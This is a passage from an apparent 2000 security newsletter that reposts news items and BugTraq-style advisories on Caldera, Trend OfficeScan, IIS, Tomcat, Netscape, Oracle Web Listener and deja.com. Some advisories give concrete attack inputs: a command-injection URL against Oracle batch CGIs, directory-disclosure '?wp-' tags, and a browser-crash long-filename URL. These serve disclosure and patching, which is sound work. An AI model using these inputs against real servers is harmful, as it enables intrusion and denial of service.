held on $100,000 bail during the hearing in San Jose. On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars. Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in on Tuesday. Butler's attorney did not return a telephone call seeking comment. @HWA 83.0 HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by LogError Thursday 23 March 2000 on 12:19 PM The OpenLinux package contains a CGI script called rpm_query that allows a user to obtain a list of all RPM packages installed on that machine, provided the Apache Web server is running. This could be used by an intruder to determine what part of the system to attack. Link: Linux Today http://linuxtoday.com/stories/18850.html Caldera Systems Security Advisory: rpm_query allows everyone to list installed rpms Mar 22, 2000, 23:23 UTC (0 Talkbacks) Caldera Systems, Inc. Security Advisory Subject: rpm_query allows everyone to list installed rpms Advisory number: CSSA-2000-007.1 Issue date: 2000 March, 8 Last change: 2000 March, 14 Cross reference: 1. Problem Description The OpenLinux package contains a CGI script called rpm_query that allows a user to obtain a list of all RPM packages installed on that machine, provided the Apache Web server is running. This could be used by an intruder to determine what part of the system to attack. 2. Vulnerable Versions System Package ----------------------------------------------------------- OpenLinux Desktop 2.3 All packages previous to OpenLinux-2.3-17 OpenLinux eServer 2.3 All packages previous to OpenLinux-2.3-24S 3. Solution Workaround: Remove the script by executing: rm -f /home/httpd/cgi-bin/rpm_query The proper solution is to upgrade to the latest packages 4. OpenLinux Desktop 2.3 4.1 Location of Fixed Packages The upgrade packages can be found on Caldera's FTP site at: ftp://ftp.calderasystems.com/pub/openlinux/updates/2.3/current/RPMS @HWA 84.0 HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by LogError Thursday 23 March 2000 on 12:14 PM Businesses can have their network security hosted and managed remotely using a new service from Network Associates. The company's myCIO.com service offers an ASP 'infrastructure' which allows partners such as ISPs, telecoms providers and even computer resellers to host NAI's products and services online. Link: VNUNET http://www.vnunet.com/News/601120 @HWA 85.0 HNS:Mar 23rd:"ANTI-ARAB" BUG ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 3:29 AM The head of Microsoft's European and Middle East operations said on Wednesday the firm was fixing a bug in its Windows 2000 French-language spell-checker which suggested replacing "anti-stress" with the word "anti-arab." Link: Wired http://www.wired.com/news/politics/0,1283,35117,00.html MS Fixing 'Anti-Arab' Bug Reuters 7:00 a.m. Mar. 22, 2000 PST PARIS -- The head of Microsoft's European and Middle East operations said on Wednesday the firm was fixing a bug in its Windows 2000 French-language spell-checker which suggested replacing "anti-stress" with the word "anti-arab." Michel Lacombe, president of Microsoft EMEA, said the problem should be fixed in "a few weeks" and that customers would be offered a new version free of charge. "Microsoft is very sorry about this. We are always sensitive to things which confuse people and we are very respectful of people getting hurt," Lacombe told Reuters. "Microsoft has no problem with the Arab world, we invest in the Arab language, and in Arab countries. Our software developers are looking at a way to fix this and in a few weeks this will be behind us," he added. France's national CFDT trade union denounced Microsoft for its "racist turn of phrase." "As it is not able itself to go directly to court, the CFDT is informing national anti-racism societies. It will support any criminal action they should take," the CFDT said in a statement. Lacombe noted that the bug was in its spell-checker, not its thesaurus. "That would be worse. We are not trying to give a synonym of anti-stress, just to help the user solve a spelling problem," he said. @HWA 86.0 HNS:Mar 23rd:OFFICE 2000 PATCHES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 3:28 AM Microsoft posted Service Release 1 (SR-1) to the Web for download. It is the first collection of patches and fixes for Office 2000 since the product began shipping last June. Link: Microsoft http://officeupdate.microsoft.com/default.asp @HWA 87.0 HNS:Mar 23rd:SHARING INFORMATION ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 3:16 AM A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act. Link: NewsBytes http://www.newsbytes.com/pubNews/00/146086.html Bill Would Protect Firms That Share Hacking Info By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM CST A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act (FOIA). Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va., later this week, the legislation would allow companies to share information about cyberattacks with law enforcers and industry groups, without worrying that such information could come back to haunt them, Davis staffer David Marin said today. "The public interest will be served by companies coming forth to share their information" about attacks, Marin said. Too often now companies do not report cyberattacks for fear that such reports will find their way into the media, he said. While the bill would create a limited shelter under FOIA, it is not intended to allow companies to mask their business dealings, Marin said. When the legislation is completed it will be "narrowly tailored to address (information pertaining to) how the attack was done and what was done to fix the attack," Marin said. The legislation will apply only to telecommunications and information technology infrastructure attacks. Used primarily by the media, FOIA allows members of the press and the public to file legally binding requests for public documents. FOIA already contains an exemption for ongoing criminal investigations, by Davis and Moran are aiming to further protect firms that divulge information about cyberattacks, Marin said. Reported by Newsbytes.com, http://www.newsbytes.com . @HWA 88.0 HNS:Mar 23rd:MONITORING WITH GOOD RESULTS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 2:31 AM A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time. Link: GovExec article http://www.govexec.com/dailyfed/0300/032000m1.htm Link: US vs. Simons - court's decision http://www.law.emory.edu/4circuit/feb2000/994238.p.html GovExec; March 20, 2000 DAILY BRIEFING Court upholds agency reviews of employees' Internet use By Kellie Lunney klunney@govexec.com A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time. The CIA's Foreign Broadcast Information Service implemented a policy in June 1998 authorizing "electronic audits" of employee computers in order to crack down on non-business related Internet use. Those audits included reviewing employees' e-mail messages and collecting information on their Web site visits. Later that summer, Science Applications International Corp. (SAIC), which had a contract to manage FBIS' computer network and monitor inappropriate Internet behavior, alerted the agency when the keyword "sex" turned up numerous hits in a firewall database during a routine test. The hits originated from the computer of Mark L. Simons, an electronic engineer at FBIS. FBIS officials then searched Simons' computer and office on four occasions, eventually compiling enough evidence to indict him on two counts of knowingly receiving and possessing child pornography downloaded from the Internet and stored on his government hard drive. Simons claimed that his Fourth Amendment rights had been violated during the searches. But a district court upheld the searches. Simons was found guilty and was sentenced to 18 months in jail. The U.S. Court of Appeals for the Fourth Circuit affirmed that decision in late February, saying that Simons failed to prove that he had a "legitimate expectation of privacy in the place searched or the item seized." According to the appeals court, "In the final analysis, this case involves an employee's supervisor entering the employee's government office and retrieving a piece of government equipment in which the employee had absolutely no expectation of privacy [due to the agency's Internet policy]�equipment that the employer knew contained evidence of crimes committed by the employee in the employee's office ... Here, there was a conjunction of the conduct that violated the employer's policy and the conduct that violated the criminal law." The court's decision in USA v. Simons (99-4238) is online at www.law.emory.edu/4circuit/feb2000/994238.p.html. @HWA 89.0 HNS:Mar 23rd:CRIME FIGHTING LAB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 2:15 AM With an eye toward cracking down on cyber crime, officials at the College of DuPage on Monday unveiled a new state-of-the-art computer lab at the college's Suburban Law Enforcement Academy. Link: Chicago Tribune http://www.chicagotribune.com/news/metro/dupage/printedition/article/0,2669,SAV-0003210202,FF.html FIGHTING CRIME ON COMPUTER LAB GIFTS LET COLLEGE OFFER CLASS FULL-TIME By LeAnn Spencer Tribune Staff Writer March 21, 2000 With an eye toward cracking down on cyber crime, officials at the College of DuPage on Monday unveiled a new state-of-the-art computer lab at the college's Suburban Law Enforcement Academy. There, officers will learn how to track computer criminals, from pedophiles who prey on children to shysters out to bilk people of money to hackers who infiltrate confidential Web sites. The lab at the Glen Ellyn school also will train officers in how to conduct on-line investigations, in computer modeling that will enable them to reconstruct a crime scene, and in how to present the evidence in court. The new lab was made possible by a donation from Microsoft Corp. and Omni Tech Corp. of 51 new personal computers, screens and keyboards; a printer and overhead projector; all the necessary software; and technical support services. The equipment and software are valued at $250,000, college officials said, and enable the college to create one of the nation's few specialized computer crime labs dedicated to training law enforcement personnel. No civilians will be able to enroll in the 40-hour, weeklong classes, which will cost $475 in tuition. "The industry is very motivated in learning how to tackle the problems" of computer crime, Bob Herbold, executive vice president and chief operating officer of Microsoft, said at a Monday unveiling of the lab. Until now, the law-enforcement academy has held its computer crime classes by borrowing computer space elsewhere on campus, and only when regular classes were out of session. The new computer lab allows the academy to offer classes virtually year-round, reaching literally hundreds of officers and prosecutors. Already, the academy is receiving attention from police departments all over the country, as well as Canada, officials said. College officials said that there is a real need for the training as police and prosecutors struggle to keep pace with the sometimes confusing world of computer crime. "When this was brand-new technology, it was difficult for police departments to follow up," said Mike Sullivan, Naperville police detective and an instructor at the law enforcement academy. But understanding the inner workings of computers and the Internet, officials said, is no different than learning any kind of new technology, whether it be fingerprinting or the use of DNA evidence. One unusual aspect of the lab will be that the police officers in the class will be able to pose as children and log on to pornographic Web sites or chat rooms where Internet users prey on the young. As pedophiles reveal themselves, they can be investigated and arrested, officials said. "It used to be that pedophiles would go to the park and pick their victims," Sullivan said. "As the Internet came along, the Internet has become the virtual park." Such real-life training is invaluable. "There's no place else that you can go in and see a felony being committed while you are doing police training," Sullivan said. Sullivan noted that many people wrongly think what they do on the Internet cannot be traced. "When a crime is committed on the Internet, it makes it easier for us to track you. It's like committing a crime and then leaving your license plate at the scene," he said. "You can't go on the Internet," he said, "without leaving a footprint." @HWA 90.0 HNS:Mar 23rd:HUNTING CROATIAN PIRATES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 1:49 AM Three days ago, first coordinated police action against software pirates in Croatia resulted with confiscation of more than 47 computers, 8536 CD's, 2602 floppy disks and nearly $1 million worth of software. Link: Bug On-line (Croatian language) http://www.bug.hr/vijesti/index.asp?datum=22032000#id3268 @HWA 91.0 HNS:Patch available for OfficeScan vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 24, 2000 Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server(IIS). ... Patch available for OfficeScan vulnerability Posted to BugTraq on March 24, 2000 Security Focus BugTraq ID: 1057 Posted: March 22, 2000 Summary ======= Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS). These versions of OfficeScan allow intruders within a firewall to invoke OfficeScan CGIs on the server without authentication - bypassing OfficeScan management console password protection. These OfficeScan CGIs are intended for administrator to manage OfficeScan antivirus running on networked workstations via the OfficeScan management console. By gaining access to execute these CGIs, hackers can use them to change OfficeScan antivirus configurations or to uninstall OfficeScan antivirus on thedesktops. Issues ====== Trend OfficeScan version 3.51 or earlier versions apply inadequate security settings on the OfficeScan server CGI components. If a malicious user, has the ability to connect to the OfficeScan server via a web browser, these CGIs can be executed to send valid commands - including uninstall command - to OfficeScan clients. In addition, OfficeScan's implementation of user authentication in its management console - password protection - was insufficiently encrypted, and allows a malicious user to decrypt and gain access to the OfficeScan management console. Implementation ============== Trend Micro has released a patch that will secure access to the OfficeScan CGIs on the server. The patch program changes the file permissions on the OfficeScan CGIs, so only administrators can access and execute them. This patch works only on drives formatted to use Windows NT file system (NTFS). After applying this patch, hackers will no longer be able to remotely invoke OfficeScan CGIs without being authenticated as a administrator by NTFS security. This patch also prevents hackers, who sniffs for OfficeScan management console password over the network, from gaining access to the OfficeScan management console. Access to the OfficeScan management console or to execute OfficeScan CGIs now requires NTFS authentication. Affected Software Versions ========================== Trend OfficeScan Corporate Edition 3.0 Trend OfficeScan Corporate Edition 3.11 Trend OfficeScan Corporate Edition 3.13 Trend OfficeScan Corporate Edition 3.50 Trend OfficeScan Corporate Edition 3.51 Trend OfficeScan for Microsoft SBS 4.5 This vulnerability is only present when the above software version is installed on a Windows NT server with IIS. It is not present when the above software version is installed on Novell NetWare servers or Windows NT server without IIS. Patch Availability ================== OfficeScan Unauthenticated CGI Usage patch can be downloaded from: http://www.antivirus.com/download/ofce_patch.htm More Information ================ Please see the following references for more information related to this issue. - Trend Micro Security Bulletin: http://www.antivirus.com/download/ofce_patch_351.htm - Frequently Asked Questions: Trend Micro Knowledge Base http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8 Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting Trend MicroTechnical Support is available at http://www.trend.com/support/default.htm Acknowledgements ================ Trend Micro thanks Gregory Duchemin http://www.securite-internet.com and Elias Levy http://www.securityfocus.com for reporting the OfficeScan server vulnerability to us, and working with us to protect our customers @HWA 92.0 HNS:Gpm-root problems ~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 23, 2000 When the user selects one of his/her favourite utility from his/her own list, gpm-root starts this process with the group and supplementary groups of the gpm-root daemon ... Gpm-root problems Posted to BugTraq on March 23, 2000 I've sent report about the following security hole to the authors of gpm, but they seemed to ignore the problem. The problem applies to every gpm version known by me, for example 1.18.1 and 1.19.0. To exploit this problem, gpm-root must be running on a machine and the user needs both login to that machine and physical access to the keyboard and mouse. gpm-root is a beautiful tool shipped in the gpm package. It pops up beautiful menus based on each user's own config file when Ctrl+Mousebutton is pressed on the console. When the user selects one of his/her favourite utility from his/her own list, gpm-root starts this process with the group and supplementary groups of the gpm-root daemon. gpm-root calls setuid() first and setgid() afterwards, hence the later one is unsuccessful. The authors completely forgot about calling initgroups(). Egmont Koblinger @HWA 93.0 HNS:Esafe Protect Gateway (CVP) problems ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 22, 2000 The Esafe Protect Gateway (ESPG) does not scan some files in combination with FireWall-1 and CVP ... Esafe Protect Gateway (CVP) problems Posted to BugTraq on March 22, 2000 After notification of the manufacturer here is the full report on aproblem noted with Esafe Protect Gateway. SUMMARY ------- The Esafe Protect Gateway (ESPG) does not scan some files in combination with FireWall-1 and CVP. DETAILS ------- If you want the Esafe Protect Gateway to scan all content for the presence of a virus you have two options. 1. Choose to scan anything not listed in the 'safe file types' list. And then clear out all entries in that list. 2. Choose to scan only files listed in the 'dangerous file types' list. And then have only one extension listed namely '*'. Deciding to rely on extensions seems an indication of a flawed designallready. Renaming files is a common practice and can be done by anyone capable of operating a keyboard. The problem is that anything with the MIME type set to TEXT/HTML will not be scanned regardless of the options recommended above. A simple test was capable of pointing this out. Setup a default Apache server. Copy a virusfile to two location beinghttp://website/test1.txt and http://website/test1.html and try to download them with your favorite browser. The URL is unique and was never used by your browser to minimize the possibilities of caches being in place. But forced reloads work properly and are sufficiant if you want to replicate this issue. Downloading http://website/test1.html dows nothing to detect the virus and it is yours. No protection is offered. Downloadinghttp://website/test1.txt will not work as ESPG will now intercept the file contain the virus. By adjusting the webserver to send out *.txt as MIME type TEXT/HTML and *.html as MIME type TEXT/PLAIN you can now test with http://website/test2.txt and http://website/test2.html to verify things. Downloading http://website/test2.txt will get you infected as ESPG will not scan the file. And downloading http://website/test2.html will not work as ESPG detects the virus and will prevent it from downloading. CONCLUSION ---------- Esafe Protect Gateway can at present not be trusted to protect you from downloading a virus. VERSIONS -------- Esafe Protect Gateway v2.1 build 98. Virus tables dated March 15, 2000. STATUS ------ Manufacturer notified. No fix available. Results have not been confirmed yet. However I was able to verify that the problem lies with Esafe and not with Check Point by using Trend Micro's CVP server instead which did not suffer from the same problem. Hugo. @HWA 94.0 HNS:Bug in Apache project: Jakarta Tomcat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 22, 2000 The Apache project: Jakarta Tomcat contains a serius security bug. Tomcat is used together with the Apache web server to serve Java Server Pages and Java servlets. ... Bug in Apache project: Jakarta Tomcat Posted to BugTraq on March 22, 2000 The Apache project: Jakarta Tomcat contains a serius security bug.Tomcat is used together with the Apache web server to serve Java Server Pages and Java servlets. Summary from the Tomcat development team advisory is posted below:Advisory: Delivered with Tomcat is an example (jsp/source.jsp) that can be used to deliver the contents of any file on your machine. Recommended action: The simplest course of action is to simply remove this example from your machine. Alternatively, you can replace the associated ShowSource.class file with one from the current 3.1 beta. Fixes: Fixes have been made to the core of Tomcat to not allow any file references to be resolved outside of the context being used for the resolution.Additionally, a change has been made to ShowSource.java to disallow any requests which contain the string "..". The 3.1 beta 1 release has been refreshed with these fixes applied. Med venlig hilsen/Best regards/Freundliche Gr��e Jan Madsen S e c u r i t y w o r k e r s @HWA 95.0 HNS:MS SECURITY BULLETIN #18 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 21, 2000 Microsoft has released a patch that eliminates a securityvulnerability in Microsoft Internet Information Server 4.0. The vulnerability could allow a malicious user to consume all resources on a web server and prevent it from servicing other users.< ... MS SECURITY BULLETIN #18 Posted to BugTraq on March 21, 2000 Microsoft Security Bulletin (MS00-018) - -------------------------------------- Patch Available for "Chunked Encoding Post" Vulnerability Originally Posted: March 20, 2000 Summary ======= Microsoft has released a patch that eliminates a securityvulnerability in Microsoft(r) Internet Information Server 4.0. Thevulnerability could allow a malicious user to consume all resources ona web server and prevent it from servicing other users. Frequently asked questions regarding this vulnerability can be foundat http://www.microsoft.com/technet/security/bulletin/fq00-018.asp. Issue ===== IIS 4.0 supports chunked encoding transfers, but does not limit thesize of the buffer that can be reserved. This would allow a malicioususer to request an extremely large buffer for a POST or PUT operation,but never actually send data, thereby blocking memory on the serverthat had been allocated to the session. If sufficient memory on theserver were blocked in this fashion, it could prevent the server fromperforming useful work. There is no capability through this attack tocreate, modify or delete data on the server, nor is there anycapability to usurp administrative control of the server. If themalicious user closed his session, the memory would be released andthe server's operation would return to normal. Otherwise, the machinecould be put back into normal service by stopping and restarting theservice. Affected Software Versions ========================== - Microsoft Internet Information Server 4.0 Patch Availability ================== - X86: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19761 - Alpha: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19762 NOTE: Additional security patches are available at the MicrosoftDownload Center @HWA 96.0 HNS:S.A.F.E.R. Security Bulletin 000317 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 20, 2000 Problem exists in Netscape Enterprise Server that can allow remote user to obtain list of directories and subdirectories on the server ... S.A.F.E.R. Security Bulletin 000317 Posted to BugTraq on March 20, 2000 S.A.F.E.R. Security Bulletin 000317.EXP.1.5 ______________________________________________ TITLE : Netscape Enterprise Server and '?wp' tags DATE : March 17, 2000 NATURE : Remote user can obtain list of directories on Netscape Enterprise Server AFFECTED : Netscape Enterprise Server 3.x PROBLEM: Problem exists in Netscape Enterprise Server that can allow remote user to obtain list of directories and subdirectories on the server. DETAILS: Netscape Enterprise Server with 'Web Publishing' enabled can be tricked into displaying the list of directories and subdirectories, if usersupplies certain 'tags'. For example: http://home.netscape.com/?wp-cs-dump will reveal the contents of the root directory on that web server.Contents of subdirectories can be obtained as well. Other tags that can be used are: ?wp-ver-info ?wp-html-rend ?wp-usr-prop ?wp-ver-diff ?wp-verify-link ?wp-start-ver ?wp-stop-ver ?wp-uncheckout FIXES: Disable 'Web Publishing'. It is safe to assume that 'Web Publishing' is not the only feature that will 'activate' this problem. We have foundfew servers running Netscape Enterprise Server that did not have 'WebPublishing' enabled, but were still vulnerable to this problem. UntilNetscape makes an official response and clarify what is the cause ofthis problem, it is advised that you test your server against thisvulnerability, and if you are vulnerable, try to disable certainfeatures and services. Netscape has been contacted on many occasions, but has failed torespond. S.A.F.E.R. - Security Alert For Entreprise Resources Copyright (c) 2000 The Relay Group @HWA 97.0 HNS:Decon fix for con/con is vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 18, 2000 If you had con problem and installed Decon fix, you are now vulnerable to another win 95(possibly)/98(tested) crash which is worse than the previous. ... Decon fix for con/con is vulnerable Posted to BugTraq on March 18, 2000 If you had con problem and installed Decon fix, you are now vulnerableto another win 95(possibly)/98(tested) crash which is worse than the previous. Software affected : All versions of Microsoft Internet Explorer (Itdoesn't work in Netscape Navigator) Actual problem :Type existing server in address box, and then request for nonexistent file with name >300 symbols. After server sends reply to the browseryour system stops responding at all, Control+Alt+Del work but youwon't see the box with tasks running so only thing you can do isREBOOT. Somebody can deface some good website and create a redirectwith 0 seconds waiting to such link. Example : http://www.amsouth.com/(lot of aaaa's).html Fix : Delete Decon fix from startup folder :) Now you are vulnerableto con/con. Hello to Cre@tor Speedo mailto:Tima@au.ru @HWA 98.0 HNS:Cerberus Information Security Advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 17, 2000 The Cerberus Security Team has discovered a number of issues with Oracle's Web Listener, part of the Oracle Application Server, that can allow a remote attacker to run arbitrary commands on the web server ... Cerberus Information Security Advisory Posted to BugTraq on March 17, 2000 Released : 15th March 2000 Name : Oracle Affected Systems : Oracle Web Listener 4.0.x on Windows NT Issue : Attackers can run arbitrary commands on the webserver Description *********** The Cerberus Security Team has discovered a number of issues with Oracle's Web Listener, part of the Oracle Application Server, that can allow aremote attacker to run arbitrary commands on the web server Details ******* Part of the problem is caused by default settings after OAS has beeninstalled. The "ows-bin" virtual directory on an Oracle Web Listener is the equivalent of the "cgi-bin" on other web servers and by default this is set toC:\orant\ows\4.0\bin - this directory not only contains a number of batch files, DLLs andexecutables but also the binary image file for the Listener itself. Even if this default setting has been changed however you may still be at risk if you have batch files in the new "ows-bin" directory. Arbitrary Command Execution *************************** The Oracle Web Listener will execute batch files as CGI scripts and bymaking a request to a batch file that requires one or more arguments it is possible to execute any command the attacker wants by building a special query string. For example the following will give a directory listing: http://charon/ows-bin/perlidlc.bat?&dir It is even possible to use UNC paths so the Listener will connect to the remote machine over NBSession, download the executable and then execute it. By default the Web Listener process runs in security context of SYSTEM so anycommands issued by an attacker will run with SYSTEM privileges. Another problem is that the Listener will expand the "*" character so even if the attacker doesn't know the name of a real batch file in the "ows-bin"they can request *.bat?&command Executables *********** Some of the executables in the default directory allow attackers to kill services, return configuration information and cause other undesirable events tooccur. Solution: ********* Due to the severity of this problem Cerberus recommends that the following be actioned immediately. If "ows-bin" is the default then using the Oracle Application Server Manager remove the ows-bin virtual directory or point it to a more benign directory. If "ows-bin" is not the default then verfiy that there are no batch files in thisdirectory. A check for this has been added to Cerberus' security scanner, CIS available from their website. About Cerberus Information Security, Ltd ******************************** Cerberus Information Security, Ltd, a UK company, are specialists inpenetration testing and other security auditing services. They are thedevelopers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk To ensure that the Cerberus Security Team remains one of the strongestsecurity audit teams available globally they continually research operating system and popular service software vulnerabilites leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services. Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405 Permission is hereby granted to copy or redistribute this advisory but onlyin its entirety. Copyright (C) 2000 by Cerberus Information Security, Ltd @HWA 99.0 HNS:Malicious-HTML vulnerabilities at deja.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 17, 2000 Deja.com does not always escape meta-characters when displaying Usenet articles. This allows an attacker to include arbitrary tags in the HTML sentto people reading the attackers article at deja.com.< ... Malicious-HTML vulnerabilities at deja.com Posted to BugTraq on March 17, 2000 Niall Smart, niall@pobox.com Synopsis ======== deja.com does not always escape meta-characters when displayingUsenet articles. Specifically, the article view page(http://www.deja.com/getdoc.xp) and the thread view page(http://www.deja.com/viewthread.xp) display the subject of thearticle "as is" between title tags. This allows an attacker to include arbitrary tags in the HTML sentto people reading the attackers article at deja.com. There are probably a large number of sites out there with this typeof vulnerability, the deja.com example is interesting because it'sa busy site with a large amount of relatively users who naivelytrust it. Exploit ======= An attacker can embed any tag in the head or body of the HTML page.This allows numerous attacks including: Cross Site Scripting: An attacker can post an article with a link to a script on anotherserver and call that script from the onLoad event handler. Site Spoofing: An attacker can use a meta tag to automatically redirect theuser to a spoofed version of deja.com. See the CERT advisory referenced below for more information on thistype of attack. Examples ======== NOTE: The following examples are intended to be harmless, however I take no responsibility for any damage caused by following these links. JavaScript popup: http://www.deja.com/getdoc.xp?AN=591804116 Redirection using meta tag: http://www.deja.com/getdoc.xp?AN=591833344 Notes ===== I haven't thoroughly tested deja.com's pages, there may be otherinstances of this error. It would be particularly interesting tofind one that didn't require the attacker to include the HTML inthe subject field of the article. This example illustrates how *not* to approach meta-characterescaping. If you call a function to escape meta-characters eachtime the data is inserted into the web page, as deja.com appear todo, you run the risk of occasionally forgetting to do it. deja.comescape correctly in two other places on the article view page butforget once. Instead you should escape them earlier in the dataflow, perhaps just after getting the data from the database, therebyprecluding the human-error factor. References ========== CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests http://www.cert.org/advisories/CA-2000-02.html HTML 3.2 Character Entities http://www.w3.org/TR/REC-html32.html#latin1 @HWA 100.0 HNS:Certificate Validation Error in Netscape Browsers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 17, 2000 The problem is that there is an inherited trust between an expiredcertificate and an active certificate, where there really shouldn't be. If any trust should be there, it certainly shouldn't be with an expired certificate. ... Certificate Validation Error in Netscape Browsers Posted to BugTraq on March 17, 2000 This may not be a normal "BugTraq" issue, since it is more a flaw in trust in a security design then it is an actual bug in software...butnone-the-less I think it is something that should be discussed. I haven't checked this with Microsoft IE, I just noticed it as being a flaw inNetscape (submitted a bug report to them earlier but they are eitherreally busy or have chosen to ignore the report.) Tested in browsers from 4.07 - 4.72, all which operated in the same fashion. What is the issue? The scenario is that a user accesses a website for which they do notcurrently have trust for the signer of the certificate. They are asked whether they would like to trust the server certificate (until itexpires,) which if they respond yes, the web site signer certificate will be stored in the certificate database. You can check on thesecertificates by clicking on the Security Icon on the browser, then select the Website item from the menu. Once stored in the database, any future access to this site is permitted without warning. The error occurs when the web site certificate is expired and the new site certificate is valid, Netscape never checks to see if the certificate is expired and replaced with a new certificate, and thus the user can continue to access the site without a warning stating that the certificate is expired and that a new certificate exists for the site (it apparently only checks to see if the new certificate isn't expired.) Manually verifying the old certificate in the database will prove that the certificate is invalid. When the site is properly reissued a certificate, Netscape automatically trusts the newcertificate based on the previous certificate...if the previouscertificate is removed from the database and the website is re-accessed, the standard warning appears asking the user if they wish to trust thecertificate. Since the new certificate is cryptographically differentfrom the old certificate, no trust relationship should exist (only thesigner is the same.) Netscape does not replace the old expired certificate with the newcertificate, and does not add the new certificate to the database. Nor does it tell the user that the new certificate a site is sending does not match a previous certificate. Why is this a problem? The problem is that there is an inherited trust between an expiredcertificate and an active certificate, where there really shouldn't be. If any trust should be there, it certainly shouldn't be with an expired certificate. The idea here is that Netscape should complain about a site which has a certificate different than what Netscape has in its database. When you accept a certificate from a website which you do not already hold a trust with the signer of the certificate, you should be warned if that certificate is no longer valid or when the server has been issued a new one. You are trusting that certificate and its signer, not that site. If the site's certificate changes, you should be warned about the change and asked if you still want to trust the site. If a hacker manages to gain access to the key and the certificate, and changes the key and thecertificate, a warning may be the only thing to protect you from thathacker becoming a man in the middle to the attack. What should be the solution? An option, in the browser, to allow the user to be warned the first time a certificate changes on a webserver. If the previous certificate isexpired, and the current certificate on a site is different, the usershould be warned of the change, and asked whether they wish the newcertificate to replace the previous one. That way, paranoid users like myself can be warned when a certificate changes, so that we can decidewhether the new certificate should be trusted. Of course, if I already trust the certificate signer, then I shouldn't be prompted about thecertificate. @HWA 101.0 HNS:"OfficeScan DoS & Message Replay" Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 17, 2000 Trend Micro has released a new version of OfficeScan Corporate Edition - version 3.51 - that eliminates two security vulnerabilities found on previous versions ... OfficeScan DoS & Message Replay" Vulnerability Posted to BugTraq on March 17, 2000 Summary ======= Trend Micro has released a new version of OfficeScan Corporate Edition - version 3.51 - that eliminates two security vulnerabilities found onprevious versions. Previous versions of OfficeScan allow intruders within a firewall to initiate a DoS attack on the OfficeScan client (tmlisten.exe) as well as to capture OfficeScan commands. These commands can be replayed and used to change other OfficeScan client configurations. Issues ====== Trend OfficeScan version 3.5 or earlier versions perform incomplete parsing and buffer overflow checking in its Windows NT client. If a malicious user, has the ability to telnet and submit some form of message to the OfficeScan NT client, OfficeScan service consumes 100% CPU processing power. Inaddition, communication between the OfficeScan server and client wasestablished with insufficient encryption and authentication, which allows a malicious user to sniff and replay OfficeScan commands. Implementation ============== Trend Micro has corrected the DoS attack issue by 